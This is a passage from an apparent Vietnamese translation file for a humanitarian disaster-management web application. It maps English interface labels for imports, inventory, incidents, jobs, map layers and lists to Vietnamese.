chỉnh sửa những gì và chỉnh sửa', 'If yes, which and how': 'nếu có thì cái nào và như thế nào', 'If you need to add a new document then you can click here to attach one.': 'Nếu cần thêm một tài liệu mới, nhấn vào đây để đính kèm', 'If you want several values, then separate with': 'Nếu bạn muốn nhiều giá trị, thì tách rời với', 'If you would like to help, then please %(sign_up_now)s': 'Nếu bạn muốn giúp đỡ, thì xin mời %(đăng ký bây giờ)s', 'If you would like to help, then please': 'Vui lòng giúp đỡ nếu bạn muốn', 'Ignore Errors?': 'Bỏ qua lỗi?', 'Illegal Immigrant': 'Người nhập cư bất hợp pháp', 'Image Details': 'Chi tiết hình ảnh', 'Image File(s), one image per page': 'Tệp hình ảnh, một hình ảnh trên một trang', 'Image Type': 'Loại hình ảnh', 'Image added': 'Thêm hình ảnh', 'Image deleted': 'Xóa hình ảnh', 'Image updated': 'Cập nhật hình ảnh', 'Image': 'Hình ảnh', 'Image/Attachment': 'Ảnh/ tệp đính kèm', 'Images': 'Các hình ảnh', 'Impact Assessments': 'Đánh giá tác động', 'Import Activity Data': 'Nhập khẩu dữ liệu hoạt động', 'Import Annual Budget data': 'Nhập khẩu dữ liệu ngân sách hàng năm', 'Import Assets': 'Nhập khẩu dữ liệu tài sản', 'Import Branch Organizations': 'Nhập khẩu dữ liệu về Tỉnh/thành Hội', 'Import Certificates': 'Nhập khẩu dữ liệu về chứng chỉ tập huấn', 'Import Community Data': 'Nhập khẩu dữ liệu cộng đồng', 'Import Completed Assessment Forms': 'Nhập khẩu biểu mẫu đánh giá đã hoàn chỉnh', 'Import Courses': 'Nhập khẩu dữ liệu về khóa tập huấn', 'Import Data for Theme Layer': 'Nhập khảu dữ liệu cho lớp chủ đề', 'Import Demographic Data': 'Nhập khẩu số liệu dân số', 'Import Demographic Sources': 'Nhập khẩu nguồn số liệu dân số', 'Import Demographic': 'Nhập khẩu dữ liệu nhân khẩu', 'Import Demographics': 'Tải dữ liệu dân số', 'Import Departments': 'Nhập khẩu dữ liệu phòng/ban', 'Import Facilities': 'Nhập khẩu bộ phận', 'Import Facility Types': 'Nhập khẩu loại hình bộ phận', 'Import File': 'Nhập khẩu File', 'Import Framework data': 'Nhập khẩu dữ liệu về khung chương trình', 'Import Hazards': 'Nhập khẩu hiểm họa', 'Import Hours': 'Nhập khẩu thời gian hoạt động', 'Import Incident Reports from Ushahidi': 'Nhập khẩu báo cáo sự cố từ Ushahidi', 'Import Incident Reports': 'Nhập khẩu báo cáo sự cố', 'Import Job Roles': 'Nhập khẩu vai trò công việc', 'Import Jobs': 'Chuyển đổi nghề nghiệp', 'Import Location Data': 'Nhập khẩu dữ liệu địa điểm', 'Import Locations': 'Nhập khẩu địa điểm', 'Import Logged Time data': 'Nhập khẩu dữ liệu thời gian truy cập', 'Import Members': 'Nhập khẩu thành viên', 'Import Membership Types': 'Nhập khẩu loại hình thành viên', 'Import Milestone Data': 'Nhập khẩu dự liệu các thời điểm quan trọng', 'Import Milestones': 'Tải dự liệu các thời điểm quan trọng', 'Import Offices': 'Nhập khẩu văn phòng', 'Import Organizations': 'Nhập khẩu tổ chức', 'Import Participant List': 'Nhập khẩu danh sách học viên', 'Import Participants': 'Tải người tham dự', 'Import Partner Organizations': 'Nhập khẩu dữ liệu về tổ chức đối tác', 'Import Project Communities': 'Đối tượng hưởng lợi dự án', 'Import Project Organizations': 'Tổ chức thực hiện dự án', 'Import Projects': 'Dự án', 'Import Red Cross & Red Crescent National Societies': 'Nhập khẩu dữ liệu về Hội CTĐ & TLLĐ Quốc gia', 'Import Staff': 'Nhập khẩu cán bộ', 'Import Stations': 'Nhập khẩu các trạm', 'Import Statuses': 'Nhập khẩu tình trạng', 'Import Suppliers': 'Nhập khẩu các nhà cung cấp', 'Import Tasks': 'Nhập khẩu Nhiệm vụ', 'Import Template Layout': 'Nhập khẩu sơ đồ mẫu', 'Import Templates': 'Nhập khẩu biểu mẫu', 'Import Theme data': 'Nhập khẩu dữ liệu chủ đề', 'Import Themes': 'Nhập khẩu Chủ đề', 'Import Training Events': 'Nhập khẩu sự kiện tập huấn', 'Import Training Participants': 'Nhập khẩu dữ liệu học viên được tập huấn', 'Import Vehicles': 'Nhập khẩu các phương tiện đi lại', 'Import Volunteer Cluster Positions': 'Nhập khẩu vị trí nhóm tình nguyện viên', 'Import Volunteer Cluster Types': 'Nhập khẩu loại hình nhóm tình nguyện viên', 'Import Volunteer Clusters': 'Nhập khẩu nhóm tình nguyện viên', 'Import Volunteers': 'Nhập khẩu tình nguyện viên', 'Import Vulnerability Aggregated Indicator': 'Nhập khẩu chỉ số phân tách tình trạng dễ bị tổn thương', 'Import Vulnerability Data': 'Nhập khẩu dữ liệu tình trạng dễ bị tổn thương', 'Import Vulnerability Indicator Sources': 'Nhập khẩu Nguồn chỉ số tình trạng dễ bị tổn thương', 'Import Vulnerability Indicator': 'Nhập khẩu chỉ số tình trạng dễ bị tổn thương', 'Import Warehouse Stock': 'Nhập khẩu hàng lưu kho', 'Import Warehouses': 'Nhập khẩu kho', 'Import from CSV': 'Nhập khẩu từ CSV', 'Import from OpenStreetMap': 'Nhập khẩu từ bản đồ OpenstreetMap', 'Import multiple tables as CSV': 'Chuyển đổi định dạng bảng sang CSV', 'Import': 'Nhập khẩu dữ liệu', 'Import/Export': 'Nhập/ Xuất dữ liệu', 'Important': 'Quan trọng', 'Imported data': 'Dữ liệu đã nhập', 'In Catalogs': 'Trong danh mục', 'In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'Trong GeoServer, đây là tên lớp. Trong WFS getCapabilities, đây là tên FeatureType, phần sau dấu hai chấm (:).', 'In Inventories': 'Trong nhóm hàng', 'In Process': 'Đang tiến hành', 'In Stock': 'Đang lưu kho', 'In error': 'mắc lỗi', 'In order to be able to edit OpenStreetMap data from within %(name_short)s, you need to register for an account on the OpenStreetMap server.': 'Để có thể chỉnh sửa dữ liệu trên OpenstreetMap từ trong %(name_short)s, ban cần đăng ký tài khoản trên máy chủ OpenStreetMap.', 'In transit': 'Đang trên đường', 'Inbound Mail Settings': 'Cài đặt thư đến', 'Inbound Message Source': 'Nguồn thư đến', 'Incident Categories': 'Danh mục sự cố', 'Incident Commander': 'Chỉ huy tình huống tai nạn', 'Incident Report Details': 'Chi tiết Báo cáo tai nạn', 'Incident Report added': 'Thêm Báo cáo tai nạn', 'Incident Report deleted': 'Xóa Báo cáo tai nạn', 'Incident Report updated': 'Cập nhật Báo cáo tai nạn', 'Incident Report': 'Báo cáo tai nạn', 'Incident Reports': 'Báo cáo sự cố', 'Incident Timeline': 'Dòng thời gian tai nạn', 'Incident Types': 'Loại sự cố', 'Incident': 'Sự cố', 'Incidents': 'Tai nạn', 'Include any special requirements such as equipment which they need to bring.': 'Bao gồm các yêu cầu đặc biệt như thiết bị cần mang theo', 'Include core files': 'Bao gồm các tệp chủ chốt', 'Including emerging and re-emerging diseases, vaccine preventable diseases, HIV, TB': 'Gồm các bệnh mới bùng phát và tái bùng phát, các bệnh có thể ngừa bằng vaccine, HIV, lao phổi', 'Incoming Shipments': 'Lô hàng đang đến', 'Incorrect parameters': 'Tham số không đúng', 'Indicator Comparison': 'So sánh chỉ số', 'Indicator': 'Chỉ số', 'Indicators': 'Chỉ số', 'Individuals': 'Cá nhân', 'Industrial Crime': 'Tội ác công nghiệp', 'Industry Fire': 'Cháy nổ công nghiệp', 'Infant (0-1)': 'Trẻ sơ sinh (0-1)', 'Infectious Disease (Hazardous Material)': 'Dịch bệnh lây nhiễm (vật liệu nguy hiểm)', 'Infectious Disease': 'Dịch bệnh lây nhiễm', 'Infestation': 'Sự phá hoại', 'Informal camp': 'Trại không chính thức', 'Information Management': 'Quản lý thông tin', #'Information Technology': 'Công nghệ thông tin', 'Information Technology': 'CNTT', 'Infrastructure Development': 'Phát triển cơ sở hạ tầng', 'Inherited?': 'Được thừa kế?', 'Initials': 'Tên viết tắt', 'Insect Infestation': 'Dịch sâu bọ', 'Instance Type': 'Loại ví dụ', 'Instant Porridge': 'Cháo ăn liền', 'Insurance Number': 'Số sổ/thẻ bảo hiểm', 'Insurer': 'Nơi đăng ký BHXH', 'Instructor': 'Giảng viên', 'Insufficient Privileges': 'Không đủ đặc quyền', 'Insufficient vars: Need module, resource, jresource, instance': 'Không đủ var: cần module, nguồn lực, j nguồn lực, tức thời', 'Integrity error: record can not be deleted while it is referenced by other records': 'Lỗi liên kết: hồ sơ không thể bị xóa khi đang được liên kết với hồ sơ khác', 'Intermediate': 'Trung cấp', 'Internal Shipment': 'Vận chuyển nội bộ', 'Internal State': 'Tình trạng bên trong', 'International NGO': 'Tổ chức phi chính phủ quốc tế', 'International Organization': 'Tổ chức quốc tế', 'Interview taking place at': 'Phỏng vấn diễn ra tại', 'Invalid Location!': 'Vị trí không hợp lệ!', 'Invalid Query': 'Truy vấn không hợp lệ', 'Invalid Site!': 'Trang không hợp lệ!', 'Invalid form (re-opened in another window?)': 'Mẫu không hợp lệ (mở lại trong cửa sổ khác?)', 'Invalid phone number!': 'Số điện thoại không hợp lệ!', 'Invalid phone number': 'Số điện thoại không đúng', 'Invalid request!': 'Yêu cầu không hợp lệ!', 'Invalid request': 'Yêu cầu không hợp lệ', 'Invalid source': 'Nguồn không hợp lệ', 'Invalid ticket': 'Vé không đúng', 'Invalid': 'Không đúng', 'Inventory Adjustment Item': 'Mặt hàng điều chỉnh sau kiểm kê', 'Inventory Adjustment': 'Điều chỉnh sau kiểm kê', 'Inventory Item Details': 'Chi tiết hàng hóa trong kho', 'Inventory Item added': 'Bổ sung hàng hóa vào kho lưu trữ.', 'Inventory Items include both consumable supplies & those which will get turned into Assets at their destination.': 'Hàng hóa kiểm kê bao gồm cả hàng tiêu hao & hàng hóa sẽ được trả lại như tài sản tại đích đến', 'Inventory Items': 'Mặt hàng kiểm kê', 'Inventory Store Details': 'Chi tiết kho lưu trữ', 'Inventory of Effects': 'Kho dự phòng', 'Inventory': 'Kiểm kê', 'Is editing level L%d locations allowed?': 'Có được phép chỉnh sửa vị trí cấp độ L%d?', 'Is this a strict hierarchy?': 'Có phải là thứ tự đúng?', 'Issuing Authority': 'Cơ quan cấp', 'It captures not only the places where they are active, but also captures information on the range of projects they are providing in each area.': 'Nó không chỉ nhận các vị trí đang kích hoạt mà cũng nhận các thông tin về các dự án đang có ở từng vùng', 'Item Added to Shipment': 'Mặt hàng được thêm vào lô hàng vận chuyển', 'Item Catalog Details': 'Thông tin danh mục hàng hóa', 'Item Catalog added': 'Đã thêm danh mục hàng hóa', 'Item Catalog deleted': 'Đã xóa danh mục hàng hóa', 'Item Catalog updated': 'Đã cập nhật danh mục hàng hóa', 'Item Catalogs': 'Danh mục hàng hóa', 'Item Categories': 'Loại hàng hóa', 'Item Category Details': 'Thông tin danh mục hàng hóa', 'Item Category added': 'Danh mục hàng hóa đã được thêm', 'Item Category deleted': 'Danh mục hàng hóa đã được xóa', 'Item Category updated': 'Danh mục hàng hóa đã được cập nhật', 'Item Category': 'Danh mục hàng hóa', 'Item Code': 'Mã hàng', 'Item Details': 'Thông tin hàng hóa', 'Item Name': 'Tên hàng', 'Item Pack Details': 'Thông tin về gói hàng', 'Item Pack added': 'Gói hàng đã được thêm', 'Item Pack deleted': 'Gói hàng đã được xóa', 'Item Pack updated': 'Gói hàng đã được cập nhật', 'Item Packs': 'Gói hàng', 'Item Status': 'Tình trạng hàng hóa', 'Item Sub-Category updated': 'Đã cập nhật tiêu chí phụ của hàng hóa', 'Item Tracking Status': 'Theo dõi tình trạng hàng hóa', 'Item added to stock': 'Mặt hàng được thêm vào kho', 'Item added': 'Mặt hàng đã được thêm', 'Item already in Bundle!': 'Hàng đã có trong Bundle!', 'Item deleted': 'Mặt hàng đã được xóa', 'Item quantity adjusted': 'Số lượng hàng đã được điều chỉnh', 'Item updated': 'Mặt hàng đã được cập nhật', 'Item': 'Mặt hàng', 'Item(s) added to Request': 'Hàng hóa đã được thêm vào yêu cầu', 'Item(s) deleted from Request': 'Hàng hóa đã được xóa khỏi yêu cầu', 'Item(s) updated on Request': 'Hàng hóa đã được cập nhật vào yêu cầu', 'Item/Description': 'Mặt hàng/ Miêu tả', 'Items in Category are Vehicles': 'Mặt hàng trong danh mục là phương tiện vận chuyển', 'Items in Category can be Assets': 'Mặt hàng trong danh mục có thể là tài sản', 'Items in Request': 'Hàng hóa trong thư yêu cầu', 'Items in Stock': 'Hàng hóa lưu kho', 'Items': 'Hàng hóa', 'Items/Description': 'Mô tả/Hàng hóa', 'JS Layer': 'Lớp JS', 'Jewish': 'Người Do Thái', 'Job Role Catalog': 'Danh mục vai trò công việc', 'Job Role Details': 'Chi tiết vai trò công việc', 'Job Role added': 'Vai trò công việc đã được thêm', 'Job Role deleted': 'Vai trò công việc đã được xóa', 'Job Role updated': 'Vai trò công việc đã được cập nhật', 'Job Role': 'Vai trò công việc', 'Job Schedule': 'Kế hoạch công việc', 'Job Title Catalog': 'Vị trí chức vụ', 'Job Title Details': 'Chi tiết chức danh công việc', 'Job Title added': 'Chức danh công việc đã được thêm', 'Job Title deleted': 'Chức danh công việc đã được xóa', 'Job Title updated': 'Chức danh công việc đã được cập nhật', 'Job Title': 'Chức danh công việc', 'Job Titles': 'Chức vụ', 'Job added': 'Công việc đã được thêm', 'Job deleted': 'Công việc đã được xóa', 'Job reactivated': 'Công việc đã được kích hoạt lại', 'Job updated': 'Công việc đã được cập nhật', 'Journal Entry Details': 'Chi tiết ghi chép nhật ký', 'Journal entry added': 'Ghi chép nhật ký đã được thêm', 'Journal entry deleted': 'Ghi chép nhật ký đã được xóa', 'Journal entry updated': 'Ghi chép nhật ký đã được cập nhật', 'Journal': 'Nhật ký', 'KML Layer': 'Lớp KML', 'Key Value pairs': 'Đôi giá trị Khóa', 'Key deleted': 'Đã xóa từ khóa', 'Key': 'Phím', 'Keyword': 'Từ khóa', 'Keywords': 'Từ khóa', 'Kit Created': 'Thùng hàng đã được tạo', 'Kit Details': 'Chi tiết thùng hàng', 'Kit Item': 'Mặt hàng trong thùng', 'Kit Items': 'Mặt hàng trong thùng', 'Kit canceled': 'Thùng hàng đã được hủy', 'Kit deleted': 'Đã xóa Kit', 'Kit updated': 'Thùng hàng đã được cập nhật', 'Kit': 'Thùng hàng', 'Kit?': 'Thùng hàng?', 'Kits': 'Thùng hàng', 'Kitting': 'Trang bị dụng cụ', 'Knowledge Management': 'Quản lý tri thức', 'Known Locations': 'Vị trí được xác định', 'LEGEND': 'CHÚ GIẢI', 'LICENSE': 'Bản quyền', 'LOW RESILIENCE': 'MỨC ĐỘ AN TOÀN THẤP', 'LOW': 'THẤP', 'Label': 'Nhãn', 'Lack of transport to school': 'Thiếu phương tiện di chuyển cho trẻ em đến trường', 'Lahar': 'Dòng dung nham', 'Land Slide': 'Sạt lở đất', 'Landslide': 'Sạt lở đất', 'Language Code': 'Mã Ngôn ngữ', 'Language code': 'Mã ngôn ngữ', 'Language': 'Ngôn ngữ', 'Last Checked': 'Lần cuối cùng được kiểm tra', 'Last Data Collected on': 'Dữ liệu mới nhất được thu thập trên', 'Last Name': 'Tên họ', 'Last Pull': 'Kéo gần nhất', 'Last Push': 'Đầy gần nhất', 'Last known location': 'Địa điểm vừa biết đến', 'Last pull on': 'Kéo về gần đây', 'Last push on': 'Đẩy vào gần đây', 'Last run': 'Lần chạy gần nhất', 'Last status': 'Trạng thái gần đây', 'Last updated': 'Cập nhật mới nhất', 'Last': 'Trang cuối', 'Latitude & Longitude': 'Vĩ độ & Kinh độ', 'Latitude is Invalid!': 'Vị độ không hợp lệ', 'Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': 'Vĩ độ là Bắc-Nam (trên xuống). Vĩ độ bằng không trên đường xích đạo, dương phía bán cầu Bắc và âm phía bán cầu Nam', 'Latitude is North-South (Up-Down).': 'Vĩ độ Bắc-Nam (trên-xuống)', 'Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': 'Vĩ độ bằng 0 là ở xích đạo và có giá trị dương ở bắc bán cầu và giá trị âm ở nam bán cầu', 'Latitude must be between -90 and 90.': 'Vĩ độ phải nằm giữa -90 và 90', 'Latitude of Map Center': 'Vĩ độ trung tâm bản đồ vùng', 'Latitude of far northern end of the region of interest.': 'Vĩ độ bắc điểm cuối của vùng quan tâm', 'Latitude of far southern end of the region of interest.': 'Vĩ độ nam điểm cuối của vùng quan tâm', 'Latitude should be between': 'Vĩ độ phải từ ', 'Latitude': 'Vĩ độ', 'Latrines': 'nhà vệ sinh', 'Layer Details': 'Thông tin về Lớp', 'Layer Name': 'Tên lớp', 'Layer Properties': 'Đặc tính của lớp bản đồ', 'Layer added': 'Lớp đã được thêm', 'Layer deleted': 'Lớp đã được xóa', 'Layer has been Disabled': 'Lớp đã bị khóa', 'Layer has been Enabled': 'Lớp đã được bật', 'Layer removed from Symbology': 'Lớp đã được gỡ khỏi danh mục biểu tượng', 'Layer updated': 'Lớp đã được cập nhật', 'Layer': 'Lớp', 'Layers updated': 'Đã cập nhật Layer', 'Layers': 'Lớp', 'Layout': 'Định dạng', 'Lead Implementer for this project is already set, please choose another role.': 'Người thực hiện chính của Dự án này đã được chỉ định, đề nghị chọn một vai trò khác', 'Lead Implementer': 'Trưởng nhóm thực hiện', 'Lead Organization': 'Tổ chức chỉ đạo', 'Leader': 'Người lãnh đạo', 'Leave blank to request an unskilled person': 'Bỏ trắng nếu yêu cầu người không cần kỹ năng', 'Left-side is fully transparent (0), right-side is opaque (1.0).': 'Bên trái là hoàn toàn trong suốt (0), bên phải là không trong suốt (1.0)', 'Legend URL': 'Chú giải URL', 'Legend': 'Chú giải', 'Length (m)': 'Chiều dài (m)', 'Length': 'Độ dài', 'Less Options': 'Thu hẹp chức năng', 'Level of Award (Count)': 'Trình độ học vấn (Số lượng)', 'Level of Award': 'Trình độ học vấn', 'Level of competency this person has with this skill.': 'Cấp độ năng lực của người này với kỹ năng đó', 'Level': 'Cấp độ', 'Library support not available for OpenID': 'Thư viện hỗ trợ không có sẵn cho việc tạo ID', 'License Number': 'Số giấy phép', 'Link (or refresh link) between User, Person & HR Record': 'Đường dẫn (hay đường dẫn mới) giữa người dùng, người và hồ sơ cán bộ', 'Link to this result': 'Đường dẫn tới kết quả này', 'Link': 'Liên kết', 'List / Add Baseline Types': 'Liệt kê / thêm loại hình khảo sát trước can thiệp', 'List / Add Impact Types': 'Liệt kê / thêm loại tác động', 'List Activities': 'Liêt kê hoạt động', 'List Activity Types': 'Liệt kê loại hoạt động', 'List Addresses': 'Liệt kê địa chỉ', 'List Affiliations': 'Liệt kê liên kết', 'List Aid Requests': 'Danh sách Yêu cầu cứu trợ', 'List All Catalogs & Add Items to Catalogs': 'Liệt kê danh mục & Thêm mục mặt hàng vào danh mục', 'List All Commitments': 'Liệt kê tất cả cam kết', 'List All Community Contacts': 'Liệt kê tất cả thông tin liên lạc của cộng đồng', 'List All Entries': 'Liệt kê tất cả hồ sơ', 'List All Essential Staff': 'Liệt kê tất cả cán bộ quan trọng', 'List All Item Categories': 'Liệt kê tât cả danh mục hàng hóa', 'List All Items': 'Liệt kê tất cả mặt hàng', 'List All Memberships': 'Danh sách tất cả các thành viên', 'List All Requested Items': 'Liệt kê tất cả mặt hàng được yêu cầu', 'List All Requested Skills': 'Liệt kê tất cả kỹ năng được yêu cầu', 'List All Requests': 'Liệt kê tất cả yêu cầu', 'List All Roles': 'Liệt kê tất cẩ vai trò', 'List All Security-related Staff': 'Liệt kê tất cả cán bộ liên quan đến vai trò bảo vệ', 'List All Users': 'Liệt kê tất cả người dùng', 'List All': 'Liệt kê tất cả', 'List Alternative Items': 'Liệt kê mặt hàng thay thế', 'List Annual Budgets': 'Liệt kê ngân sách năm', 'List Assessment Answers': 'Liêt kê câu trả lời trong biểu mẫu đánh giá', 'List Assessment Questions': 'Liệt kê câu hỏi trong biểu mẫu đánh giá', 'List Assessment Templates': 'Liệt kê biểu mẫu đánh giá', 'List Assessments': 'Danh sách Trị giá tính thuế', 'List Assets': 'Liệt kê tài sản', 'List Assigned Human Resources': 'Liệt kê nguồn nhân lực đã được phân công', 'List Beneficiaries': 'Liệt kê người hưởng lợi', 'List Beneficiary Types': 'Liệt kê loại người hưởng lợi', 'List Branch Organizations': 'Liệt kê tổ chức cơ sở', 'List Brands': 'Liệt kê nhãn hiệu', 'List Catalog Items': 'Liệt kê mặt hàng trong danh mục', 'List Catalogs': 'Liệt kê danh mục', 'List Certificates': 'Liệt kê chứng chỉ', 'List Certifications': 'Liệt kê bằng cấp', 'List Checklists': 'Danh sách Checklists ', 'List Clusters': 'Liệt kê nhóm', 'List Commitment Items': 'Liệt kê mặt hàng cam kết', 'List Commitments': 'Liệt kê cam kết', 'List Committed People': 'Liệt kê người cam kết', 'List Communities': 'Liệt kê cộng đồng', 'List Community Contacts': 'Thông tin liên hệ cộng đồng', 'List Competency Ratings': 'Liệt kê xếp hạng năng lực', 'List Completed Assessment Forms': 'Liệt kê biểu mẫu đánh giá đã hoàn thiện', 'List Contact Information': 'Liệt kê thông tin liên lạc', 'List Contacts': 'Liệt kê liên lạc', 'List Course Certificates': 'Liệt kê Chứng chỉ khóa học', 'List Courses': 'Liệt kê khóa học', 'List Credentials': 'Liệt kê thư ủy nhiệm', 'List Current': 'Danh mục hiện hành', 'List Data in Theme Layer': 'Liệt kê dữ liệu trong lớp chủ đề ', 'List Demographic Data': 'Liệt kê số liệu dân số', 'List Demographic Sources': 'Liệt kê nguồn thông tin về dân số', 'List Demographics': 'Liệt kê dữ liệu nhân khẩu', 'List Departments': 'Liệt kê phòng/ban', 'List Disaster Assessments': 'Liệt kê báo cáo đánh giá thảm họa', 'List Distributions': 'Danh sách ủng hộ,quyên góp', 'List Documents': 'Liệt kê tài liệu', 'List Donors': 'Liệt kê nhà tài trợ', 'List Education Details': 'Liệt kê thông tin về trình độ học vấn', 'List Facilities': 'Liệt kê bộ phận', 'List Facility Types': 'Liệt kê loại hình bộ phận', 'List Feature Layers': 'Liệt kê lớp chức năng', 'List Frameworks': 'Liệt kê khung chương trình', 'List Groups': 'Liệt kê nhóm', 'List Hazards': 'Liệt kê hiểm họa', 'List Hospitals': 'Danh sách Bệnh viện', 'List Hours': 'Liệt kê thời gian hoạt động', 'List Identities': 'Liệt kê nhận dạng', 'List Images': 'Liệt kê hình ảnh', 'List Incident Reports': 'Liệt kê báo cáo sự cố', 'List Item Categories': 'Liệt kê danh mục hàng hóa', 'List Item Packs': 'Liệt kê gói hàng', 'List Items in Request': 'Liệt kê mặt hàng đang được yêu cầu', 'List Items in Stock': 'Liệt kê mặt hàng đang lưu kho', 'List Items': 'Liệt kê hàng hóa', 'List Job Roles': 'Liệt kê vai trò công việc', 'List Job Titles': 'Liệt kê chức danh công việc', 'List Jobs': 'Liệt kê công việc', 'List Kits': 'Liệt kê thùng hàng', 'List Layers in Profile': 'Liệt kê lớp trong hồ sơ tiểu sử', 'List Layers in Symbology': 'Liệt kê lớp trong biểu tượng', 'List Layers': 'Liệt kê lớp', 'List Location Hierarchies': 'Liệt kê thứ tự địa điểm', 'List Locations': 'Liệt kê địa điểm', 'List Log Entries': 'Liệt kê ghi chép nhật ký', 'List Logged Time': 'Liệt kê thời gian đang nhập', 'List Mailing Lists': 'Liệt kê danh sách gửi thư', 'List Map Profiles': 'Liệt kê cấu hình bản đồ', 'List Markers': 'Liệt kê công cụ đánh dấu', 'List Members': 'Liệt kê hội viên', 'List Membership Types': 'Liệt kê loại hình nhóm hội viên', 'List Memberships': 'Liệt kê nhóm hội viên', 'List Messages': 'Liệt kê tin nhắn', 'List Metadata': 'Danh sách dữ liệu', 'List Milestones': 'Liệt kê mốc thời gian quan trọng', 'List Missing Persons': 'Danh sách những người mất tích', 'List Office Types': 'Liệt kê loại hình văn phòng', 'List Offices': 'Liệt kê văn phòng', 'List Orders': 'Liệt kê lệnh', 'List Organization Domains': 'Liệt kê lĩnh vực hoạt động của tổ chức', 'List Organization Types': 'Liệt kê loại hình tổ chức', 'List Organizations': 'Liệt kê tổ chức', 'List Outputs': 'Liệt kê đầu ra', 'List Participants': 'Liệt kê người Tham dự', 'List Partner Organizations': 'Liệt kê tổ chức đối tác', 'List Persons': 'Liệt kê đối tượng', 'List Photos': 'Liệt kê ảnh', 'List Profiles configured for this Layer': 'Liệt kê tiểu sử được cấu hình cho lớp này', 'List Programs': 'Liệt kê chương trình', 'List Project Organizations': 'Liệt kê tổ chức dự án', 'List Projections': 'Liệt kê dự đoán', 'List Projects': 'Liệt kê dự án', 'List Question Meta-Data': 'Liệt kê siêu dữ liệu câu hỏi', 'List Received/Incoming Shipments': 'Liệt kê lô hàng nhận được/đang đến', 'List Records': 'Liệt kê hồ sơ', 'List Red Cross & Red Crescent National Societies': 'Liệt kê Hội CTĐ & TLLĐ quốc gia', 'List Repositories': 'Liệt kê kho lưu trữ', 'List Request Items': 'Danh sách Hang hóa yêu cầu', 'List Requested Skills': 'Liệt kê kỹ năng được yêu cầu', 'List Requests': 'Liệt kê yêu cầu', 'List Resources': 'Liệt kê nguồn lực', 'List Rivers': 'Danh sách sông', 'List Roles': 'Liệt kê vai trò', 'List Rooms': 'Liệt kê phòng', 'List Sectors': 'Liệt kê lĩnh vực', 'List Sent Shipments': 'Liệt kê lô hàng đã gửi đi', 'List Shelter Services': 'Danh sách dịch vụ cư trú', 'List Shipment Items': 'Liệt kê mặt hàng trong lô hàng', 'List Shipment/Way Bills': 'Danh sách Đơn hàng/Phí đường bộ', 'List Sites': 'Danh sách site', 'List Skill Equivalences': 'Liệt kê kỹ năng tương đương', 'List Skill Types': 'Liệt kê loại kỹ năng', 'List Skills': 'Liệt kê kỹ năng', 'List Staff & Volunteers': 'Liệt kê Cán bộ và Tình nguyện viên', 'List Staff Assignments': 'Liệt kê phân công cán bộ', 'List Staff Members': 'Liệt kê cán bộ', 'List Staff Types': 'Lên danh sách các bộ phận nhân viên', 'List Staff': 'Danh sách Nhân viên', 'List Statuses': 'Liệt kê tình trạng', 'List Stock Adjustments': 'Liệt kê điều chỉnh hàng lưu kho', 'List Stock in Warehouse': 'Liệt kê hàng lưu trong kho hàng', 'List Storage Location': 'Danh sách vị trí kho lưu trữ', 'List Subscriptions': 'Danh sách Đăng ký', 'List Suppliers': 'Liệt kê nhà cung cấp', 'List Support Requests': 'Liệt kê đề nghị hỗ trợ', 'List Survey Questions': 'Danh sách câu hỏi khảo sát', 'List Survey Series': 'Lên danh sách chuỗi khảo sát', 'List Symbologies for Layer': 'Liệt kê biểu tượng cho Lớp', 'List Symbologies': 'Liệt kê biểu tượng', 'List Tasks': 'Liệt kê nhiệm vụ', 'List Teams': 'Liệt kê Đội/Nhóm', 'List Template Sections': 'Liệt kê nội dung biểu mẫu', 'List Themes': 'Liệt kê chủ đề', 'List Training Events': 'Liệt kê khóa tập huấn', 'List Trainings': 'Liệt kê lớp tập huấn', 'List Units': 'Danh sách đơn vị', 'List Users': 'Liệt kê người sử dụng', 'List Vehicle Assignments': 'Liệt kê phân công phương tiện vận chuyển', 'List Volunteer Cluster Positions': 'Liệt kê vị trí nhóm tình nguyện viên', 'List Volunteer Cluster Types': 'Liệt kê loại hình nhóm tình nguyện viên', 'List Volunteer Clusters': 'Liệt kê nhóm tình nguyện viên', 'List Volunteer Roles': 'Liệt kê vai trò của tình nguyện viên', 'List Volunteers': 'Liệt kê tình nguyện viên', 'List Vulnerability Aggregated Indicators': 'Liệt kê chỉ số gộp đánh giá tình trạng dễ bị tổn thương', 'List Vulnerability Data': 'Liệt kê dữ liệu về tình trạng dễ bị tổn thương', 'List Vulnerability Indicator Sources': 'Liệt kê nguồn chỉ số đánh giá tình trạng dễ bị tổn thương', 'List Vulnerability Indicators': 'Liệt kê chỉ số đánh giá tình trạng dễ bị tổn thương', 'List Warehouses': 'Liệt kê kho hàng', 'List alerts': 'Liệt kê cảnh báo', 'List all Entries': 'Liệt kê tất cả hồ sơ', 'List all': 'Liệt kê tất cả', 'List of Missing Persons': 'Danh sách những người mất tích', 'List of Professional Experience': 'Danh sách kinh nghiệm nghề nghiệp', 'List of Requests': 'Danh sách yêu cầu', 'List of Roles': 'Danh sách vai trò', 'List of addresses': 'Danh sách các địa chỉ', 'List saved searches': 'Liệt kê tìm kiếm đã lưu', 'List templates': 'Liệt kê biểu mẫu', 'List unidentified': 'Liệt kê danh mục chư tìm thấy', 'List': 'Liệt kê', 'List/Add': 'Liệt kê/ Thêm', 'Lists "who is doing what & where". Allows relief agencies to coordinate their activities': 'Danh sách "Ai làm gì, ở đâu"Cho phép các tổ chức cứu trợ điều phối hoạt động của mình', 'Live Help': 'Trợ giúp trực tuyến', 'Livelihood': 'Sinh kế', 'Livelihoods': 'Sinh kế', 'Load Cleaned Data into Database': 'Tải dữ liệu sạch vào cơ sở dữ liệu', 'Load Raw File into Grid': 'Tải file thô vào hệ thống mạng', 'Load': 'Tải', 'Loaded By': 'Được tải lên bởi', 'Loading report details': 'Tải thông tin báo cáo', 'Loading': 'Đang tải', 'Local Name': 'Tên địa phương', 'Local Names': 'Tên địa phương', 'Location (Site)': 'Địa điểm (vùng)', 'Location 1': 'Địa điểm 1', 'Location 2': 'Địa điểm 2', 'Location 3': 'Địa điểm 3', 'Location Added': 'Địa điểm đã được thêm', 'Location Deleted': 'Địa điểm đã được xóa', 'Location Detail': 'Thông tin địa điểm', 'Location Details': 'Thông tin địa điểm', 'Location Group': 'Nhóm địa điểm', 'Location Hierarchies': 'Thứ tự địa điểm', 'Location Hierarchy Level 1 Name': 'Tên thứ tự địa điểm cấp 1', 'Location Hierarchy Level 2 Name': 'Tên thứ tự địa điểm cấp 2', 'Location Hierarchy Level 3 Name': 'Tên thứ tự địa điểm cấp 